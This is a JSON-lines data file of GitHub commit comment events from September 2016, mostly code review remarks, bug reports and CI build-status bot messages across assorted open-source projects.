{"id":"4519027439","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18905171,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T03:17:46Z","updated_at":"2016-09-06T03:17:46Z","body":"hmm, I guess we need apply this patch:\nhttps://github.com/BohuTANG/ft-index/commit/e48ac39c6644114c674f600dbdc4b34788e47091\n\n\nOn Tue, Sep 6, 2016 at 11:16 AM, zhangzaki <notifications@github.com> wrote:\n\n> Combination of mariadb 10.0.20 and tokudb 7.5.7。\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/BohuTANG/percona-xtrabackup/commit/b43ba1b25deff2ba21eb9030b49413e1851f263b#commitcomment-18905163>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAKgrB9F1T_Zt4l48u75888sySWrsuTTks5qnNsTgaJpZM4JxQEk>\n> .\n>\n\n\n\n-- \nBohuTANG\n\n\"The great artist is the simplifier.\"--- *Vincent Van Gogh*\n"}},"created_at":"2016-09-06T03:17:46Z"}
{"id":"4519027493","type":"CommitCommentEvent","actor":{"login":"kbenne"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905172,"position":33,"line":248,"path":"openstudiocore/src/cli/main.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T03:17:48Z","updated_at":"2016-09-06T03:17:48Z","body":"I think I just threw up in my mouth a little. I know saw code like [this](https://github.com/NREL/OpenStudio/commit/6eb9dfdd9d67e4f0bc06d666cc87cbdf590dbc00#diff-0ed08feb5dcfc8c9c9054ab3c43bc9a4R15) before. I'm going to make a commit along those lines here and we can talk about it in the morning if it should stay or go. "}},"created_at":"2016-09-06T03:17:48Z"}
{"id":"4519029435","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18905181,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T03:18:44Z","updated_at":"2016-09-06T03:18:44Z","body":"I assume you know that Object.keys().length and for..in will return different answers for all objects that have non null prototypes? And that the performance of for..in depends on the length of the prototype chain? Not to mention that that naive assumption is really naive :) IMO it is better for len() to be accurate than fast. The best performace is to be had by directly using the  .length or .size properties when you know they type of object. len() will never be able to compete with that. "}},"created_at":"2016-09-06T03:18:44Z"}
{"id":"4519031933","type":"CommitCommentEvent","actor":{"login":"hyperwang"},"repo":{"name":"btccom/btcpool"},"payload":{"comment":{"id":18905185,"position":null,"line":null,"path":null,"commit_id":"e5923956708a39fefac677569d60815ccccf5ed2","created_at":"2016-09-06T03:19:57Z","updated_at":"2016-09-06T03:19:57Z","body":"more readable"}},"created_at":"2016-09-06T03:19:57Z"}
{"id":"4519032397","type":"CommitCommentEvent","actor":{"login":"FreakTheMighty"},"repo":{"name":"mapillary/OpenSfM"},"payload":{"comment":{"id":18905187,"position":10,"line":218,"path":"opensfm/video.py","commit_id":"608fab053c5cb237f240b3b768fc3ac2675426a9","created_at":"2016-09-06T03:20:08Z","updated_at":"2016-09-06T03:20:08Z","body":"I've hit a scenarios where p_new is `None`. I'm guessing its because of a really blurry frame. The results is this traceback:\r\n```\r\n  File \"/OpenSfM/opensfm/video.py\", line 219, in track_video\r\n    for [(x,y)] in p_new:\r\nTypeError: 'NoneType' object is not iterable\r\n```"}},"created_at":"2016-09-06T03:20:08Z"}
{"id":"4519033837","type":"CommitCommentEvent","actor":{"login":"SeeingBlue"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18905188,"position":null,"line":null,"path":null,"commit_id":"05a3f19929ff28f3b8c4c0ae9de1e31fd2e314a8","created_at":"2016-09-06T03:20:41Z","updated_at":"2016-09-06T03:20:41Z","body":"How could I edit this to not render any spawnpoints that are inactive, aka hue 275?"}},"created_at":"2016-09-06T03:20:41Z"}
{"id":"4519034687","type":"CommitCommentEvent","actor":{"login":"astronouth7303"},"repo":{"name":"meatballs/xontrib-thefuck"},"payload":{"comment":{"id":18905190,"position":null,"line":null,"path":null,"commit_id":"8a929963884888270a5774afa8b1e1060a20d50e","created_at":"2016-09-06T03:21:05Z","updated_at":"2016-09-06T03:21:05Z","body":"This should do nothing? Why?"}},"created_at":"2016-09-06T03:21:05Z"}
{"id":"4519035017","type":"CommitCommentEvent","actor":{"login":"jlsalazar"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18905191,"position":null,"line":null,"path":null,"commit_id":"2a827657a40cb32806c0a56783f1af4094c606fd","created_at":"2016-09-06T03:21:13Z","updated_at":"2016-09-06T03:21:13Z","body":"i got-----> AttributeError: 'TelegramHandler' object has no attribute 'master'\r\nafter this commit"}},"created_at":"2016-09-06T03:21:13Z"}
{"id":"4519035168","type":"CommitCommentEvent","actor":{"login":"jack-trikeapps"},"repo":{"name":"tricycle/tricycle.github.com"},"payload":{"comment":{"id":18905192,"position":28,"line":26,"path":"_posts/2016-09-06-a-better-way-to-consult.markdown","commit_id":"40312409c5da76d3ab112546a8f6bf83d15dc0f4","created_at":"2016-09-06T03:21:17Z","updated_at":"2016-09-06T03:21:17Z","body":"Fine, but the ellipsis is creating a more casual tone than I think you want. Maybe:\r\n\r\n\"While it's more complicated than that and there are other incentives in play, that basic perverse incentive is an inherent part of this contract structure.\""}},"created_at":"2016-09-06T03:21:17Z"}
{"id":"4519036799","type":"CommitCommentEvent","actor":{"login":"RobertBColton"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":18905204,"position":null,"line":null,"path":null,"commit_id":"016ebd05315f11030c0f2c3296d79b5ee053a1a3","created_at":"2016-09-06T03:22:01Z","updated_at":"2016-09-06T03:22:01Z","body":"If you notice in LGM it uses the ID for the GUI title of the extension. Originally I had the same confusion you are having now. I am interested to know if it has broken anything. Would be nice for @JoshDreamland to clarify which is the correct interpretation of each."}},"created_at":"2016-09-06T03:22:01Z"}
{"id":"4519036815","type":"CommitCommentEvent","actor":{"login":"astronouth7303"},"repo":{"name":"meatballs/xontrib-thefuck"},"payload":{"comment":{"id":18905205,"position":1,"line":1,"path":"xontrib/thefuck.py","commit_id":"f17c43ebadf324fc02cd4cc0e6598095521090ea","created_at":"2016-09-06T03:22:02Z","updated_at":"2016-09-06T03:22:02Z","body":"This line should be unnecessary. Report it as a bug if that's not the case."}},"created_at":"2016-09-06T03:22:02Z"}
{"id":"4519038346","type":"CommitCommentEvent","actor":{"login":"Wilkamus"},"repo":{"name":"Wilkamus/Wilkamus.github.io"},"payload":{"comment":{"id":18905207,"position":null,"line":null,"path":null,"commit_id":"cce4f672d11e1b863b666dd49238b57718a8f2d3","created_at":"2016-09-06T03:22:45Z","updated_at":"2016-09-06T03:22:45Z","body":"![wyoming cowboys](https://cloud.githubusercontent.com/assets/22013737/18260830/da240ccc-73ae-11e6-9113-8d1c58d9bdf2.PNG)\r\n"}},"created_at":"2016-09-06T03:22:45Z"}
{"id":"4519039761","type":"CommitCommentEvent","actor":{"login":"phanan"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905211,"position":12,"line":552,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T03:23:27Z","updated_at":"2016-09-06T03:23:27Z","body":"My inner grammar nazi suggests it should be `event/watcher` (no spaces)."}},"created_at":"2016-09-06T03:23:27Z"}
{"id":"4519040962","type":"CommitCommentEvent","actor":{"login":"escalonn"},"repo":{"name":"escalonn/sed2"},"payload":{"comment":{"id":18905220,"position":null,"line":null,"path":null,"commit_id":"816da4d9d383a6fa642e70d179e2f36d9ed1029e","created_at":"2016-09-06T03:24:00Z","updated_at":"2016-09-06T03:24:00Z","body":"_mission critical_ stuff going on here :)"}},"created_at":"2016-09-06T03:24:00Z"}
{"id":"4519041283","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"escalonn/sed2"},"payload":{"comment":{"id":18905221,"position":null,"line":null,"path":null,"commit_id":"816da4d9d383a6fa642e70d179e2f36d9ed1029e","created_at":"2016-09-06T03:24:10Z","updated_at":"2016-09-06T03:24:10Z","body":"totally."}},"created_at":"2016-09-06T03:24:10Z"}
{"id":"4519042942","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18905225,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T03:24:51Z","updated_at":"2016-09-06T03:24:51Z","body":"Just to expand on the really naive comment. All the various DOM collection objects such as NodeList, NamedNodeMap, etc. have a length property but no indexOf. So len() can be made much faster by checking for those objects explicitly and using length rather than iterating over them. See the implementation of len() in rs-ng. "}},"created_at":"2016-09-06T03:24:51Z"}
{"id":"4519044096","type":"CommitCommentEvent","actor":{"login":"deepsea887"},"repo":{"name":"jquery/jquery-mobile"},"payload":{"comment":{"id":18905229,"position":null,"line":null,"path":null,"commit_id":"9a2daa07058e6f4a768d524ecb55fdb797eeb858","created_at":"2016-09-06T03:25:21Z","updated_at":"2016-09-06T03:25:21Z","body":"how many"}},"created_at":"2016-09-06T03:25:21Z"}
{"id":"4519047818","type":"CommitCommentEvent","actor":{"login":"sheshmantha"},"repo":{"name":"sheshmantha/Bundles"},"payload":{"comment":{"id":18905234,"position":null,"line":null,"path":null,"commit_id":"78ae80a7bf8a2956401351fcba4aa1cee4bebae5","created_at":"2016-09-06T03:27:09Z","updated_at":"2016-09-06T03:27:09Z","body":"Comment is incorrect... Actual comment follows:\r\nAdded test class for BundledPriceComputer, fixed couple of double / float issues, also fixed issue with what happens when there are no bundles (actually could optimize this case by not even doing a powerset of cart)."}},"created_at":"2016-09-06T03:27:09Z"}
{"id":"4519048397","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905235,"position":null,"line":null,"path":null,"commit_id":"169ba8998ce291a71bc39ee9895714fd54dc6e02","created_at":"2016-09-06T03:27:23Z","updated_at":"2016-09-06T03:27:23Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T03:27:23Z"}
{"id":"4519048726","type":"CommitCommentEvent","actor":{"login":"ScoTTwwww"},"repo":{"name":"ScoTTwwww/WWE"},"payload":{"comment":{"id":18905236,"position":null,"line":null,"path":null,"commit_id":"aee05e3423a8ee5f04c57b1e05ca69c01858ded4","created_at":"2016-09-06T03:27:31Z","updated_at":"2016-09-06T03:27:31Z","body":"111111"}},"created_at":"2016-09-06T03:27:31Z"}
{"id":"4519049298","type":"CommitCommentEvent","actor":{"login":"ScoTTwwww"},"repo":{"name":"ScoTTwwww/WWE"},"payload":{"comment":{"id":18905238,"position":null,"line":null,"path":null,"commit_id":"aee05e3423a8ee5f04c57b1e05ca69c01858ded4","created_at":"2016-09-06T03:27:46Z","updated_at":"2016-09-06T03:27:46Z","body":"中文測試"}},"created_at":"2016-09-06T03:27:46Z"}
{"id":"4519049724","type":"CommitCommentEvent","actor":{"login":"ScoTTwwww"},"repo":{"name":"ScoTTwwww/WWE"},"payload":{"comment":{"id":18905239,"position":1,"line":1,"path":"readme.txt","commit_id":"aee05e3423a8ee5f04c57b1e05ca69c01858ded4","created_at":"2016-09-06T03:27:57Z","updated_at":"2016-09-06T03:27:57Z","body":"WWE?"}},"created_at":"2016-09-06T03:27:57Z"}
{"id":"4519049890","type":"CommitCommentEvent","actor":{"login":"phanan"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905240,"position":26,"line":566,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T03:28:02Z","updated_at":"2016-09-06T03:28:02Z","body":"Maybe `beforeDestroy` and `destroyed` should be moved to the end of this document. In other words, the list order should follow as closely to the actual lifecycle as possible. For instance, this is the current 1.x structure, which I find to make a lot of sense:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/8056274/18260910/8ad4af64-741c-11e6-982d-2078beaf41ae.png)\r\n"}},"created_at":"2016-09-06T03:28:02Z"}
{"id":"4519050193","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18905242,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-06T03:28:10Z","updated_at":"2016-09-06T03:28:10Z","body":"The very beginning (two or more years ago) original behavior is **installing the original WinPcap driver for XP/Vista**, and it should be what it is like now.\r\n\r\nIndeed, I once added back Npcap drver's support to Vista on my own (which is not a requested feature from our Nmap side). The cost is the driver binaries are doubled. But things have changed. Based on now we are adding new Wi-Fi support, it means the drivers will be doubled again. Yes. We have automated scripts that can do the job, but the Digicert timestamp server on my side is so slow. And when I changed to a domestic timestamp provider WoSign, there're some complaints about the install error.\r\n\r\nSo I'm just asking to roll back to the original behavior: **installing the original WinPcap driver for XP/Vista**. Of course, the current installer has some bugs dealing with the XP/Vista condition. I will fix it.\r\n\r\n"}},"created_at":"2016-09-06T03:28:10Z"}
{"id":"4519052248","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905250,"position":4,"line":4,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T03:29:02Z","updated_at":"2016-09-06T03:29:02Z","body":"通常列表页使用到，这里是我多声明了依赖，确实没有用到需要删掉"}},"created_at":"2016-09-06T03:29:02Z"}
{"id":"4519054652","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905253,"position":null,"line":null,"path":null,"commit_id":"169ba8998ce291a71bc39ee9895714fd54dc6e02","created_at":"2016-09-06T03:30:11Z","updated_at":"2016-09-06T03:30:11Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T03:30:11Z"}
{"id":"4519054790","type":"CommitCommentEvent","actor":{"login":"leiwang008"},"repo":{"name":"SAFSDEV/Core"},"payload":{"comment":{"id":18905254,"position":null,"line":null,"path":null,"commit_id":"b78a6539ae43ec32345ea92345d23d30a96daf62","created_at":"2016-09-06T03:30:14Z","updated_at":"2016-09-06T03:30:14Z","body":"These are only my opinions!\r\nThere are some thing (I don't like so much) in this code push:\r\n1. Your modification doesn't change the any essential thing, we still set the original string to the clipboard.\r\n2. We normally don't print the stack trace directly. Either we log a message (an Exception parameter could be passed in with some method of Log), or we wrap it in our own Exception and throw out, or we could do both.\r\n3. Please remove any generated comments.\r\n"}},"created_at":"2016-09-06T03:30:14Z"}
{"id":"4519055342","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905255,"position":null,"line":null,"path":null,"commit_id":"169ba8998ce291a71bc39ee9895714fd54dc6e02","created_at":"2016-09-06T03:30:27Z","updated_at":"2016-09-06T03:30:27Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T03:30:27Z"}
{"id":"4519059380","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905259,"position":87,"line":87,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T03:32:19Z","updated_at":"2016-09-06T03:32:19Z","body":"确实会体验好很多，用户点击的有效区域变大了，涨姿势了"}},"created_at":"2016-09-06T03:32:19Z"}
{"id":"4519059951","type":"CommitCommentEvent","actor":{"login":"phanan"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905262,"position":14,"line":554,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T03:32:33Z","updated_at":"2016-09-06T03:32:33Z","body":"This is repeated across all hooks, which IMHO is a bit redundant. This is the same with 1.x doc as well, when it's inconsistent, too, for example `attached` and `detached` don't have this line. I'd suggest in 2.x we include the diagram right at the beginning of this whole \"Options / Life Cycle Hooks\" section."}},"created_at":"2016-09-06T03:32:33Z"}
{"id":"4519060896","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18905265,"position":null,"line":null,"path":null,"commit_id":"4b85abbc2a1a8dd7d5802b20839605a20bdcec02","created_at":"2016-09-06T03:32:52Z","updated_at":"2016-09-06T03:32:52Z","body":"Yes, thanks, I reported the wrong bench, will submit again..."}},"created_at":"2016-09-06T03:32:52Z"}
{"id":"4519068696","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905285,"position":126,"line":126,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T03:36:32Z","updated_at":"2016-09-06T03:36:32Z","body":"这里是获取到当前页面的content的内容，$$Page的data属性中定义的参数，可用于tpl中的数据绑定"}},"created_at":"2016-09-06T03:36:32Z"}
{"id":"4519068913","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905286,"position":null,"line":null,"path":null,"commit_id":"169ba8998ce291a71bc39ee9895714fd54dc6e02","created_at":"2016-09-06T03:36:38Z","updated_at":"2016-09-06T03:36:38Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T03:36:38Z"}
{"id":"4519068924","type":"CommitCommentEvent","actor":{"login":"phanan"},"repo":{"name":"vuejs/vuejs.org"},"payload":{"comment":{"id":18905287,"position":96,"line":636,"path":"src/api/index.md","commit_id":"bd5f8e334505464df76174666effe4fac1760bc5","created_at":"2016-09-06T03:36:39Z","updated_at":"2016-09-06T03:36:39Z","body":"Typo: `activated`. Or we can just replace it with \"This\" altogether: This hook is only…"}},"created_at":"2016-09-06T03:36:39Z"}
{"id":"4519070230","type":"CommitCommentEvent","actor":{"login":"bkazemi"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18905288,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T03:37:14Z","updated_at":"2016-09-06T03:37:14Z","body":"Well, until we tackle the Unicode problem, I suppose you can just keep in in a `char *` variable and add a comment to let dev's know that it might hold non ASCII stuff."}},"created_at":"2016-09-06T03:37:14Z"}
{"id":"4519071821","type":"CommitCommentEvent","actor":{"login":"jwminaz"},"repo":{"name":"jwminaz/ista420"},"payload":{"comment":{"id":18905291,"position":null,"line":null,"path":null,"commit_id":"dd8b6951562a37b80f34048f70a28a5053b0729f","created_at":"2016-09-06T03:37:59Z","updated_at":"2016-09-06T03:37:59Z","body":"Created a README file"}},"created_at":"2016-09-06T03:37:59Z"}
{"id":"4519072972","type":"CommitCommentEvent","actor":{"login":"kid551"},"repo":{"name":"SAFSDEV/Core"},"payload":{"comment":{"id":18905293,"position":null,"line":null,"path":null,"commit_id":"b78a6539ae43ec32345ea92345d23d30a96daf62","created_at":"2016-09-06T03:38:31Z","updated_at":"2016-09-06T03:38:31Z","body":"Thanks for your suggestion. New commit has been sent in: https://github.com/SAFSDEV/Core/commit/cc67938dca2f262c683c3504a612d41bfd9c2d55 ."}},"created_at":"2016-09-06T03:38:31Z"}
{"id":"4519078607","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"awwalker/minio-go"},"payload":{"comment":{"id":18905302,"position":160,"line":287,"path":"api-put-object-file.go","commit_id":"5102522107410b9f5e40b8ef716c6c88eef8cff9","created_at":"2016-09-06T03:41:12Z","updated_at":"2016-09-06T03:41:12Z","body":"You need to rebase this logic has been changed."}},"created_at":"2016-09-06T03:41:12Z"}
{"id":"4519081268","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905306,"position":null,"line":null,"path":null,"commit_id":"169ba8998ce291a71bc39ee9895714fd54dc6e02","created_at":"2016-09-06T03:42:26Z","updated_at":"2016-09-06T03:42:26Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-169ba8998ce291a71bc39ee9895714fd54dc6e02-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-06T03:42:26Z"}
{"id":"4519084810","type":"CommitCommentEvent","actor":{"login":"md2perpe"},"repo":{"name":"Luxurioust/excelize"},"payload":{"comment":{"id":18905309,"position":22,"line":42,"path":"README.md","commit_id":"50863294f9d6f2ecc399d06f1b3c2312c4bdce10","created_at":"2016-09-06T03:44:07Z","updated_at":"2016-09-06T03:44:07Z","body":"That's an unfortunate name of the method. It collides with the `WriterTo` interface:\r\nhttps://golang.org/pkg/io/#WriterTo"}},"created_at":"2016-09-06T03:44:07Z"}
{"id":"4519086855","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905310,"position":14,"line":0,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"21cbec5f8e5c33d3d5b17c4f846d310c8b104f97","created_at":"2016-09-06T03:45:09Z","updated_at":"2016-09-06T03:45:09Z","body":"This could reuse attr_reader/writer for simplicity and performance"}},"created_at":"2016-09-06T03:45:09Z"}
{"id":"4519087067","type":"CommitCommentEvent","actor":{"login":"wildweasel486"},"repo":{"name":"wildweasel486/ww-cash2"},"payload":{"comment":{"id":18905311,"position":null,"line":null,"path":null,"commit_id":"8fae1ada4bd9cd465cd96a26811eddf5bc1a8205","created_at":"2016-09-06T03:45:14Z","updated_at":"2016-09-06T03:45:14Z","body":"Oh. Um...I'd forgotten you were a member of this repo. Heh. =P"}},"created_at":"2016-09-06T03:45:14Z"}
{"id":"4519089535","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"wrengr/containers"},"payload":{"comment":{"id":18905315,"position":null,"line":null,"path":null,"commit_id":"c3bd2bebeb14db03da8e64f141141838ebc9da25","created_at":"2016-09-06T03:46:23Z","updated_at":"2016-09-06T03:46:23Z","body":"Yes, this makes sense. We'll have to do something similar with whatever representation we ultimately use for the tactics, of course. I wasn't worrying about this sort of thing because I was assuming that `mergeA` would always be inlined, pushing the record access to compile time; it would be better not to rely on this more than necessary, however."}},"created_at":"2016-09-06T03:46:23Z"}
{"id":"4519091536","type":"CommitCommentEvent","actor":{"login":"qw3rtman"},"repo":{"name":"CoppellAppDevelopment/new-members"},"payload":{"comment":{"id":18905319,"position":null,"line":null,"path":null,"commit_id":"9a681fef87b929dc5f8e470ed783828390fc6444","created_at":"2016-09-06T03:47:18Z","updated_at":"2016-09-06T03:47:18Z","body":"🎉"}},"created_at":"2016-09-06T03:47:18Z"}
{"id":"4519091553","type":"CommitCommentEvent","actor":{"login":"edthebat"},"repo":{"name":"wildweasel486/ww-cash2"},"payload":{"comment":{"id":18905320,"position":null,"line":null,"path":null,"commit_id":"8fae1ada4bd9cd465cd96a26811eddf5bc1a8205","created_at":"2016-09-06T03:47:19Z","updated_at":"2016-09-06T03:47:19Z","body":"I just always assumed you figured this was simpler than having me fork-and-request for everything I had to offer, like in the other projects."}},"created_at":"2016-09-06T03:47:19Z"}
{"id":"4519091577","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905321,"position":6,"line":0,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"9edb5f9bf3e89dff34deb430693050420b222ed8","created_at":"2016-09-06T03:47:19Z","updated_at":"2016-09-06T03:47:19Z","body":"Object.const_get(path)\nOtherwise there is a nice way to do this with inject"}},"created_at":"2016-09-06T03:47:19Z"}
{"id":"4519091791","type":"CommitCommentEvent","actor":{"login":"jlindgren90"},"repo":{"name":"adplug/adplug"},"payload":{"comment":{"id":18905322,"position":5,"line":65,"path":"src/adtrack.cpp","commit_id":"65a5c82045003c6afd8e66babe123b577e49e0db","created_at":"2016-09-06T03:47:26Z","updated_at":"2016-09-06T03:47:26Z","body":"Well, this is very C-ish C++. :/  Modern C++ would use a \"smart\" file descriptor object that closes automatically when it goes out of scope.  Then we could just \"return false\" and the compiler would take care of the rest."}},"created_at":"2016-09-06T03:47:26Z"}
{"id":"4519092893","type":"CommitCommentEvent","actor":{"login":"vturn"},"repo":{"name":"vturn/contenthashcheck"},"payload":{"comment":{"id":18905324,"position":null,"line":null,"path":null,"commit_id":"213e99bed2549c493d80adacf68f809c3a955c2a","created_at":"2016-09-06T03:48:02Z","updated_at":"2016-09-06T03:48:02Z","body":"Start"}},"created_at":"2016-09-06T03:48:02Z"}
{"id":"4519093766","type":"CommitCommentEvent","actor":{"login":"dyan03"},"repo":{"name":"dyan03/myclass2"},"payload":{"comment":{"id":18905326,"position":1,"line":1,"path":"HW0.java","commit_id":"02d97aad6ab28384fae069f2ba3f2f65da65a58f","created_at":"2016-09-06T03:48:27Z","updated_at":"2016-09-06T03:48:27Z","body":"what\r\n"}},"created_at":"2016-09-06T03:48:27Z"}
{"id":"4519098583","type":"CommitCommentEvent","actor":{"login":"huychau"},"repo":{"name":"krispo/angular-nvd3"},"payload":{"comment":{"id":18905335,"position":11,"line":11,"path":"dist/angular-nvd3.js","commit_id":"39f67d4c2c30aa63f55755bdc2be9dd47c1b4303","created_at":"2016-09-06T03:50:52Z","updated_at":"2016-09-06T03:50:52Z","body":"When you use `browserify-shim`,  `typeof(exports)` is `object`. It available with condition, but  module `nvd3` not found from `angular-nvd3.js` (`nv = require('nvd3');`). Please help to check it again."}},"created_at":"2016-09-06T03:50:52Z"}
{"id":"4519098658","type":"CommitCommentEvent","actor":{"login":"ax003d"},"repo":{"name":"ax003d/GDMS_api"},"payload":{"comment":{"id":18905336,"position":null,"line":null,"path":null,"commit_id":"45e79a900f3f58957eb3d55648e02e2585d778e9","created_at":"2016-09-06T03:50:54Z","updated_at":"2016-09-06T03:50:54Z","body":"Code was not recognized as API Description file. Not updating."}},"created_at":"2016-09-06T03:50:54Z"}
{"id":"4519098666","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905337,"position":5,"line":0,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"22710129cea4d5d2ccf126a64661fbcc351e00f4","created_at":"2016-09-06T03:50:54Z","updated_at":"2016-09-06T03:50:54Z","body":"Since Module < Class, only the second guard is necessary"}},"created_at":"2016-09-06T03:50:54Z"}
{"id":"4519102437","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18905339,"position":23,"line":0,"path":"truffle/src/main/ruby/core/enumerable.rb","commit_id":"294d80fb883e765e81de58db666487a9608edf35","created_at":"2016-09-06T03:52:46Z","updated_at":"2016-09-06T03:52:46Z","body":"I think it would just work if &block is passed and is nil, no?"}},"created_at":"2016-09-06T03:52:46Z"}
